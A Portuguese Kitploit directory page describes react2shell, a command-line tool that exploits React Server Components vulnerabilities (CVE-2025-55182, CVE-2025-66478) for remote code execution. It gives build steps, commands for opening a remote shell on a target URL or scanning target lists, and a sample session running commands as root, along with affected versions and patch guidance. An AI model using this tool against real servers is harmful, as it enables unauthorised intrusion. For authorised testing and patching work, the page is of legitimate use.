Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell — Uma ferramenta de linha de comando que explora vulnerabilidades em React Server Components e Server Actions (CVE-2025-55182, CVE-2025-66478) para alcançar execução remota de código (RCE) em servidores vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/mantvmass/react2shell
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoArchived
GitHubmantvmass/react2shell

react2shell

Uma ferramenta de linha de comando que explora vulnerabilidades em React Server Components e Server Actions (CVE-2025-55182, CVE-2025-66478) para alcançar execução remota de código (RCE) em servidores vulneráveis.

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

React2Shell

Uma ferramenta CLI para explorar vulnerabilidades de poluição de protótipo em Componentes de Servidor React / Server Actions (CVE-2025-55182 e CVE-2025-66478), permitindo execução remota de código (RCE) em servidores vulneráveis.

PoC original: https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc

AVISO: Esta ferramenta tem como alvo uma vulnerabilidade crítica (CVSS 10.0) que está ativamente explorada na natureza. Use apenas em sistemas que você possui ou para os quais tem autorização explícita para testar.

Aviso Legal

Esta ferramenta destina-se exclusivamente a fins educacionais, testes de segurança autorizados, testes de penetração com permissão e pesquisa de vulnerabilidades.

O autor e os colaboradores não assumem nenhuma responsabilidade por qualquer uso indevido, dano ou consequência legal resultante do uso desta ferramenta. Você é totalmente responsável por garantir que seu uso esteja em conformidade com todas as leis, regulamentos e termos de serviço aplicáveis.

O uso não autorizado contra sistemas sem permissão é ilegal na maioria das jurisdições e pode resultar em penalidades severas.

Instalação

A partir do código fonte

root@kitploit:~
git clone https://github.com/mantvmass/react2shell.git
cd react2shell
cargo build --release

O binário estará em target/release/react2shell (ou react2shell.exe no Windows).

Binários pré-compilados

Baixe da página de Releases.

Uso

root@kitploit:~
react2shell [COMANDO] [ORIGEM]

Comandos

  • open <URL>: Abre um shell reverso interativo no alvo (se vulnerável).
  • scan <ARQUIVO>: Escaneia uma lista de alvos de um arquivo (uma URL por linha) em busca de vulnerabilidades.

Exemplos

root@kitploit:~
# Open interactive shell
react2shell open http://vulnerable-target.com

# Scan multiple targets
react2shell scan targets.txt

# Scan single target
react2shell scan http://127.0.0.1:3000

Exemplos de shell interativo

root@kitploit:~
[email protected]:3000 (js)
$ /help                                                    # Display all supported commands
Commands;
  /new <URL> ; Switch URL target                           # Switch URL target
  /use exec ; Execute command and wait for output          # Switch to exec mode (waits for result)
  /use exec-no-wait ; Execute command without waiting      # Exec mode without waiting for output
  /use js ; Execute JavaScript code                        # Switch back to JavaScript mode
  /set timeout <ms> ; Set command timeout in milliseconds  # Configure command timeout
  /show options ; Show current configuration               # Display current shell settings
  /clear ; Clear screen                                    # Clear the terminal screen
  /exit or /quit ; Exit the shell                          # Exit the interactive shell

Examples;
  ls -la                                                 # Example Linux command
  whoami                                                 # Show current system user
  console.log('Hello')                                   # Example JavaScript command

[email protected]:3000 (js)
$ /use exec                                              # Switch from JS mode to exec mode
[+] Switch shell mode to exec

[email protected]:3000 (exec)
$ whoami                                                 # Verify current execution user
root                                                     # Command output

Versões Afetadas

Next.js

Aplicações que usam React Server Components com o App Router são afetadas ao executar as seguintes versões:

  • Next.js 15.x
  • Next.js 16.x
  • Next.js 14.3.0-canary.77 e versões canary posteriores

Os seguintes não são afetados:

  • Next.js 13.x
  • Next.js 14.x (versões estáveis)
  • Aplicações que usam o Pages Router
  • Implantações Edge Runtime

React

A vulnerabilidade existe nas versões do React 19.0, 19.1.0, 19.1.1 e 19.2.0 nos seguintes pacotes:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack

Atualizações imediatas para versões corrigidas são fortemente recomendadas, especialmente para ambientes de produção.

Mitigação

A correção principal é atualizar para versões corrigidas do React e Next.js.

Para aplicações Next.js, use o corrigidor automatizado oficial:

root@kitploit:~
npx fix-react2shell-next

Mais informações: vercel-labs/fix-react2shell-next

Veja os comunicados oficiais:

  • React: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
  • Next.js: https://nextjs.org/blog/CVE-2025-66478

Licença

Este projeto é disponibilizado apenas para fins educacionais e de pesquisa de segurança autorizada. Toda a responsabilidade pelo uso recai sobre o usuário final.

Baixar ferramenta